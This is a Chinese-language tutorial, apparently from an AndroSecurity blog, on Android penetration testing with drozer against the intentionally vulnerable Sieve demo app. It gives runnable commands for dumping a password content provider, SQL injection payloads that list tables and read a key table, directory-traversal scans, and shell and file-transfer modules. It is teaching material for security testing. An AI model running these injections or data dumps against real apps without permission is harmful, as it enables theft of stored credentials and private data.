利用drozer進行Android滲透測試 - AndroSecurity
一、安裝與啓動
1. 安裝
第一步:從 http://mwr.to/drozer 下載Drozer (Windows Installer)
第二步:在 Android 設備中安裝 agent.apk
adb install agent.apk
2. 啓動
第一步:在 PC 上使用 adb 進行端口轉發,轉發到 Drozer使用的端口 31415
adb forward tcp:31415 tcp:31415
第二步:在 Android 設備上開啓 Drozer Agent
選擇 embedded server-enable
第三步:在 PC 上開啓 Drozer console
drozer console connect
二、測試步驟
1.獲取包名
dz> run app.package.list -f sieve
com.mwr.example.sieve
2.獲取應用的基本信息
run app.package.info -a com.mwr.example.sieve
3.確定攻擊面
run app.package.attacksurface com.mwr.example.sieve
4.Activity
( 1 )獲取 activity 信息
run app.activity.info -a com.mwr.example.sieve
( 2 )啓動 activity
run app.activity.start --component com.mwr.example.sieve
dz> help app.activity.start
usage: run app.activity.start [-h] [--action ACTION] [--category CATEGORY]
[--component PACKAGE COMPONENT] [--data-uri DATA_URI]
[--extra TYPE KEY VALUE] [--flags FLAGS [FLAGS ...]]
[--mimetype MIMETYPE]
5.Content Provider
( 1 )獲取 Content Provider 信息
run app.provider.info -a com.mwr.example.sieve
(2)Content Providers (數據泄露)
先獲取所有可以訪問的 Uri :
run scanner.provider.finduris -a com.mwr.example.sieve
獲取各個 Uri 的數據:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
查詢到數據說明存在漏洞
(3)Content Providers ( SQL 注入)
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'" run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
報錯則說明存在 SQL 注入。
列出所有表:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
獲取某個表(如 Key )中的數據:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
( 4 )同時檢測 SQL 注入和目錄遍歷
run scanner.provider.injection -a com.mwr.example.sieve
run scanner.provider.traversal -a com.mwr.example.sieve
6.Service
(1)獲取 service 詳情
run app.service.info -a com.mwr.example.sieve
7. 其它模塊
shell.start 在設備上開啓一個交互shell
tools.file.upload / tools.file.download 上傳/下載文件到設備
tools.setup.busybox / tools.setup.minimalsu 安裝可用的二進制文件